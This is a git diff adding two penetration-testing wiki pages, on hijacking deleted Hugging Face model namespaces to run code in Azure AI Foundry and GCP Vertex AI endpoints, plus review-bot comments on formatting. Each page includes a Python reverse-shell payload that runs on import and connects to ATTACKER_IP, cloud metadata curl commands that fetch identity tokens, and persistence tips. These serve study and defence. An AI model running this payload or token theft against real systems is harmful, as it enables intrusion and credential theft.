diff --git a/src/SUMMARY.md b/src/SUMMARY.md index 1cedf02053..7d93f52b05 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -96,6 +96,7 @@ - [GCP - Pub/Sub Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.md) - [GCP - Secretmanager Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md) - [GCP - Security Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.md) + - [Gcp Vertex Ai Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-vertex-ai-post-exploitation.md) - [GCP - Workflows Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.md) - [GCP - Storage Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md) - [GCP - Privilege Escalation](pentesting-cloud/gcp-security/gcp-privilege-escalation/README.md) @@ -461,6 +462,7 @@ - [Az - PTA - Pass-through Authentication](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pta-pass-through-authentication.md) - [Az - Seamless SSO](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-seamless-sso.md) - [Az - Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/README.md) + - [Az Azure Ai Foundry Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-azure-ai-foundry-post-exploitation.md) - [Az - Blob Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md) - [Az - CosmosDB Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.md) - [Az - File Share Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md) 
diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/README.md b/src/pentesting-cloud/azure-security/az-post-exploitation/README.md index 234962b1c8..52b7c1b91e 100644 --- a/src/pentesting-cloud/azure-security/az-post-exploitation/README.md +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/README.md @@ -2,4 +2,8 @@ {{#include ../../../banners/hacktricks-training.md}} +{{#ref}} +az-azure-ai-foundry-post-exploitation.md +{{#endref}} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-azure-ai-foundry-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-azure-ai-foundry-post-exploitation.md new file mode 100644 index 0000000000..959e01d3b2 --- /dev/null +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-azure-ai-foundry-post-exploitation.md 
@@ -0,0 +1,104 @@ +# Azure - AI Foundry Post-Exploitation via Hugging Face Model Namespace Reuse + +{{#include ../../../banners/hacktricks-training.md}} + +## Scenario + +- Azure AI Foundry Model Catalog includes many Hugging Face (HF) models for one-click deployment. +- HF model identifiers are Author/ModelName. If an HF author/org is deleted, anyone can re-register that author and publish a model with the same ModelName at the legacy path. +- Pipelines and catalogs that pull by name only (no commit pinning/integrity) will resolve to attacker-controlled repos. When Azure deploys the model, loader code can execute in the endpoint environment, granting RCE with that endpoint’s permissions. + +Common HF takeover cases: +- Ownership deletion: Old path 404 until takeover. +- Ownership transfer: Old path 307 to the new author while old author exists. If the old author is later deleted and re-registered, the redirect breaks and the attacker’s repo serves at the legacy path. + +## Identifying Reusable Namespaces (HF) + +```bash +# Check author/org existence +curl -I https://huggingface.co/ # 200 exists, 404 deleted/available + +# Check model path +curl -I https://huggingface.co// +# 307 -> redirect (transfer case), 404 -> deleted until takeover +``` + +## End-to-end Attack Flow against Azure AI Foundry + +1) In the Model Catalog, find HF models whose original authors were deleted or transferred (old author removed) on HF. +2) Re-register the abandoned author on HF and recreate the ModelName. +3) Publish a malicious repo with loader code that executes on import or requires trust_remote_code=True. +4) Deploy the legacy Author/ModelName from Azure AI Foundry. The platform pulls the attacker repo; loader executes inside the Azure endpoint container/VM, yielding RCE with endpoint permissions. 
+ +Example payload fragment executed on import (for demonstration only): + +```python +# __init__.py or a module imported by the model loader +import os, socket, subprocess, threading + +def _rs(host, port): + s = socket.socket(); s.connect((host, port)) + for fd in (0,1,2): + try: + os.dup2(s.fileno(), fd) + except Exception: + pass + subprocess.call(["/bin/sh","-i"]) # or powershell on Windows images + +if os.environ.get("AZUREML_ENDPOINT","1") == "1": + threading.Thread(target=_rs, args=("ATTACKER_IP", 4444), daemon=True).start() +``` + +Notes +- AI Foundry deployments that integrate HF typically clone and import repo modules referenced by the model’s config (e.g., auto_map), which can trigger code execution. Some paths require trust_remote_code=True. +- Access usually matches the endpoint’s managed identity/service principal permissions. Treat it as an initial access foothold for data access and lateral movement within Azure. + +## Post-Exploitation Tips (Azure Endpoint) + +- Enumerate environment variables and MSI endpoints for tokens: + +```bash +# Azure Instance Metadata Service (inside Azure compute) +curl -H "Metadata: true" \ + "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" +``` + +- Check mounted storage, model artifacts, and reachable Azure services with the acquired token. +- Consider persistence by leaving poisoned model artifacts if the platform re-pulls from HF. + +## Defensive Guidance for Azure AI Foundry Users + +- Pin models by commit when loading from HF: + +```python +from transformers import AutoModel +m = AutoModel.from_pretrained("Author/ModelName", revision="") +``` + +- Mirror vetted HF models to a trusted internal registry and deploy from there. +- Continuously scan codebases and defaults/docstrings/notebooks for hard-coded Author/ModelName that are deleted/transferred; update or pin. +- Validate author existence and model provenance prior to deployment. 
+ +## Recognition Heuristics (HTTP) + +- Deleted author: author page 404; legacy model path 404 until takeover. +- Transferred model: legacy path 307 to new author while old author exists; if old author later deleted and re-registered, legacy path serves attacker content. + +```bash +curl -I https://huggingface.co// | egrep "^HTTP|^location" +``` + +## Cross-References + +- See broader methodology and supply-chain notes: + +{{#ref}} +../../pentesting-cloud-methodology.md +{{#endref}} + +## References + +- [Model Namespace Reuse: An AI Supply-Chain Attack Exploiting Model Name Trust (Unit 42)](https://unit42.paloaltonetworks.com/model-namespace-reuse/) +- [Hugging Face: Renaming or transferring a repo](https://huggingface.co/docs/hub/repositories-settings#renaming-or-transferring-a-repo) + +{{#include ../../../banners/hacktricks-training.md}} \ No newline at end of file diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md index e241336969..8f4597e1ad 100644 --- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md +++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md @@ -2,4 +2,8 @@ {{#include ../../../banners/hacktricks-training.md}} +{{#ref}} +gcp-vertex-ai-post-exploitation.md +{{#endref}} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-vertex-ai-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-vertex-ai-post-exploitation.md new file mode 100644 index 0000000000..b43cf5669d --- /dev/null +++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-vertex-ai-post-exploitation.md 
@@ -0,0 +1,123 @@ +# GCP - Vertex AI Post-Exploitation via Hugging Face Model Namespace Reuse + +{{#include ../../../banners/hacktricks-training.md}} + +## Scenario + +- Vertex AI Model Garden allows direct deployment of many Hugging Face (HF) models. +- HF model identifiers are Author/ModelName. If an author/org on HF is deleted, the same author name can be re-registered by anyone. Attackers can then create a repo with the same ModelName at the legacy path. +- Pipelines, SDKs, or cloud catalogs that fetch by name only (no pinning/integrity) will pull the attacker-controlled repo. When the model is deployed, loader code from that repo can execute inside the Vertex AI endpoint container, yielding RCE with the endpoint’s permissions. + +Two common takeover cases on HF: +- Ownership deletion: Old path 404 until someone re-registers the author and publishes the same ModelName. +- Ownership transfer: HF issues 307 redirects from old Author/ModelName to the new author. If the old author is later deleted and re-registered by an attacker, the redirect chain is broken and the attacker’s repo serves at the legacy path. + +## Identifying Reusable Namespaces (HF) + +- Old author deleted: the page for the author returns 404; model path may return 404 until takeover. +- Transferred models: the old model path issues 307 to the new owner while the old author exists. If the old author is later deleted and re-registered, the legacy path will resolve to the attacker’s repo. 
+ +Quick checks with curl: + +```bash +# Check author/org existence +curl -I https://huggingface.co/ +# 200 = exists, 404 = deleted/available + +# Check old model path behavior +curl -I https://huggingface.co// +# 307 = redirect to new owner (transfer case) +# 404 = missing (deletion case) until someone re-registers +``` + +## End-to-end Attack Flow against Vertex AI + +1) Discover reusable model namespaces that Model Garden lists as deployable: +- Find HF models in Vertex AI Model Garden that still show as “verified deployable”. +- Verify on HF if the original author is deleted or if the model was transferred and the old author was later removed. + +2) Re-register the deleted author on HF and recreate the same ModelName. + +3) Publish a malicious repo. Include code that executes on model load. Examples that commonly execute during HF model load: +- Side effects in __init__.py of the repo +- Custom modeling_*.py or processing code referenced by config/auto_map +- Code paths that require trust_remote_code=True in Transformers pipelines + +4) A Vertex AI deployment of the legacy Author/ModelName now pulls the attacker repo. The loader executes inside the Vertex AI endpoint container. + +5) Payload establishes access from the endpoint environment (RCE) with the endpoint’s permissions. + +Example payload fragment executed on import (for demonstration only): + +```python +# Place in __init__.py or a module imported by the model loader +import os, socket, subprocess, threading + +def _rs(host, port): + s = socket.socket(); s.connect((host, port)) + for fd in (0,1,2): + try: + os.dup2(s.fileno(), fd) + except Exception: + pass + subprocess.call(["/bin/sh","-i"]) # Or python -c exec ... + +if os.environ.get("VTX_AI","1") == "1": + threading.Thread(target=_rs, args=("ATTACKER_IP", 4444), daemon=True).start() +``` + +Notes +- Real-world loaders vary. 
Many Vertex AI HF integrations clone and import repo modules referenced by the model’s config (e.g., auto_map), which can trigger code execution. Some uses require trust_remote_code=True. +- The endpoint typically runs in a dedicated container with limited scope, but it is a valid initial foothold for data access and lateral movement in GCP. + +## Post-Exploitation Tips (Vertex AI Endpoint) + +Once code is running inside the endpoint container, consider: +- Enumerating environment variables and metadata for credentials/tokens +- Accessing attached storage or mounted model artifacts +- Interacting with Google APIs via service account identity (Document AI, Storage, Pub/Sub, etc.) +- Persistence in the model artifact if the platform re-pulls the repo + +Enumerate instance metadata if accessible (container dependent): + +```bash +curl -H "Metadata-Flavor: Google" \ + http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token +``` + +## Defensive Guidance for Vertex AI Users + +- Pin models by commit in HF loaders to prevent silent replacement: + +```python +from transformers import AutoModel +m = AutoModel.from_pretrained("Author/ModelName", revision="") +``` + +- Mirror vetted HF models into a trusted internal artifact store/registry and deploy from there. +- Continuously scan codebases and configs for hard-coded Author/ModelName that are deleted/transferred; update to new namespaces or pin by commit. +- In Model Garden, verify model provenance and author existence before deployment. + +## Recognition Heuristics (HTTP) + +- Deleted author: author page 404; legacy model path 404 until takeover. +- Transferred model: legacy path 307 to new author while old author exists; if old author later deleted and re-registered, legacy path serves attacker content. 
+ +```bash +curl -I https://huggingface.co// | egrep "^HTTP|^location" +``` + +## Cross-References + +- See broader methodology and supply-chain notes: + +{{#ref}} +../../pentesting-cloud-methodology.md +{{#endref}} + +## References + +- [Model Namespace Reuse: An AI Supply-Chain Attack Exploiting Model Name Trust (Unit 42)](https://unit42.paloaltonetworks.com/model-namespace-reuse/) +- [Hugging Face: Renaming or transferring a repo](https://huggingface.co/docs/hub/repositories-settings#renaming-or-transferring-a-repo) + +{{#include ../../../banners/hacktricks-training.md}} \ No newline at end of file diff --git a/src/pentesting-cloud/pentesting-cloud-methodology.md b/src/pentesting-cloud/pentesting-cloud-methodology.md index d3eb7a6596..bc79cb2d39 100644 --- a/src/pentesting-cloud/pentesting-cloud-methodology.md +++ b/src/pentesting-cloud/pentesting-cloud-methodology.md @@ -454,6 +454,7 @@ azure-security/ You need **Global Admin** or at least **Global Admin Reader** (but note that Global Admin Reader is a little bit limited). However, those limitations appear in some PS modules and can be bypassed accessing the features **via the web application**. + {{#include ../banners/hacktricks-training.md}}
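Review bot: the new entry `- [Gcp Vertex Ai Post Exploitation](...)` in the first `src/SUMMARY.md` hunk does not follow the naming used by every neighbouring line (`GCP - Pub/Sub Post Exploitation`, `GCP - Workflows Post Exploitation`) nor the H1 of the page it links to (`# GCP - Vertex AI Post-Exploitation via Hugging Face Model Namespace Reuse`); rename it `GCP - Vertex AI Post Exploitation` so the sidebar reads consistently.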
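Review bot: same naming issue in the second `src/SUMMARY.md` hunk, where `- [Az Azure Ai Foundry Post Exploitation](...)` sits between `Az - Post Exploitation` and `Az - Blob Storage Post Exploitation`; use `Az - AI Foundry Post Exploitation`. The filename `az-azure-ai-foundry-post-exploitation.md` also doubles the prefix compared with its siblings (`az-blob-storage-post-exploitation.md`, `az-cosmosDB-post-exploitation.md`); if you rename it to `az-ai-foundry-post-exploitation.md`, update this line, the `{{#ref}}` in `az-post-exploitation/README.md` and the new file's path together.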
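Review bot: the last added line of the `az-post-exploitation/README.md` hunk, `+{{#include ../../../banners/hacktricks-training.md}}`, repeats the banner include that is already present as unchanged context immediately above the new `{{#ref}}` block, so the rendered README looks like it will carry the training banner twice in a row; either drop the added include or place the `{{#ref}} az-azure-ai-foundry-post-exploitation.md {{#endref}}` block between the page's existing top and bottom banners instead of before a second copy.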
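Review bot: the curl and pinning examples in the new `az-azure-ai-foundry-post-exploitation.md` are missing their placeholders and do not run as shown: `curl -I https://huggingface.co/`, `curl -I https://huggingface.co//` and `AutoModel.from_pretrained("Author/ModelName", revision="")` need an author, a model name and a commit hash respectively; if the source used `<author>`-style tokens that were stripped, switch to plain `AUTHOR`, `MODEL` and `COMMIT_SHA` tokens inside the fences. In the payload, `os.environ.get("AZUREML_ENDPOINT","1") == "1"` defaults to `"1"` when the variable is absent, so the guard is always true and does not gate execution to the endpoint; either remove it or key it on a variable the text can show is set in that environment. `egrep "^HTTP|^location"` misses `Location:` on HTTP/1.1 responses (curl only lowercases header names on HTTP/2); use `grep -iE "^HTTP|^location"`. The "Identifying Reusable Namespaces (HF)" and "Recognition Heuristics (HTTP)" sections state the same two cases with the same curl check, so merge them, and add to the identification text that a 404 on the model path alone is not proof the name is free (private repos also 404), the decisive signal being the author page. Since the Notes say some loader paths require `trust_remote_code=True`, the Defensive Guidance should say to keep it `False` for any repo not mirrored and pinned. The Cross-References entry promises "supply-chain notes" in `../../pentesting-cloud-methodology.md`, but the only change to that file in this patch is a blank line, so either add those notes there or drop the reference. Finally the file ends with `\ No newline at end of file`; add the trailing newline.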
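Review bot: the `gcp-post-exploitation/README.md` hunk has the same shape as the Azure README hunk: the final added line `+{{#include ../../../banners/hacktricks-training.md}}` duplicates the banner include shown as context right above the `{{#ref}} gcp-vertex-ai-post-exploitation.md {{#endref}}` block; drop the extra include or move the ref block between the page's existing top and bottom banners.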
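Review bot: the new `gcp-vertex-ai-post-exploitation.md` repeats the defects of the Azure page and should be fixed in the same pass: the commands `curl -I https://huggingface.co/`, `curl -I https://huggingface.co//` and `AutoModel.from_pretrained("Author/ModelName", revision="")` have lost their author, model and commit placeholders (use plain `AUTHOR`, `MODEL`, `COMMIT_SHA` tokens); the payload guard `os.environ.get("VTX_AI","1") == "1"` is always true because of the `"1"` default, so it gates nothing; `egrep "^HTTP|^location"` should be `grep -iE "^HTTP|^location"` so `Location:` on HTTP/1.1 is matched. Step 1 quotes a Model Garden label, "verified deployable", that the page does not source; tie it to the real catalog wording or drop the quotes. The "Recognition Heuristics (HTTP)" section and its curl block restate "Identifying Reusable Namespaces (HF)" and the "Quick checks with curl" block from the top of the same file, so merge them, and note there that a 404 on the model path by itself does not prove availability (private repos 404 as well); the author-page 404 is the signal. Because the Notes state that some uses require `trust_remote_code=True`, the Defensive Guidance should explicitly say to leave it `False` for unmirrored, unpinned repos. The Cross-References block points to `../../pentesting-cloud-methodology.md` for supply-chain notes that this patch does not add. The file also lacks a trailing newline (`\ No newline at end of file`). Given that this page and the Azure one are near-verbatim copies apart from the endpoint name, the metadata curl and the env var, consider a single shared section on HF namespace reuse with short per-cloud subsections.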
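Review bot: the `pentesting-cloud-methodology.md` hunk is a whitespace-only change (a blank line added before `{{#include ../banners/hacktricks-training.md}}`) with no relation to the rest of the patch; drop it, or, if the intent was to give the two new pages the "supply-chain notes" their Cross-References sections cite in this file, add that content here instead of a blank line.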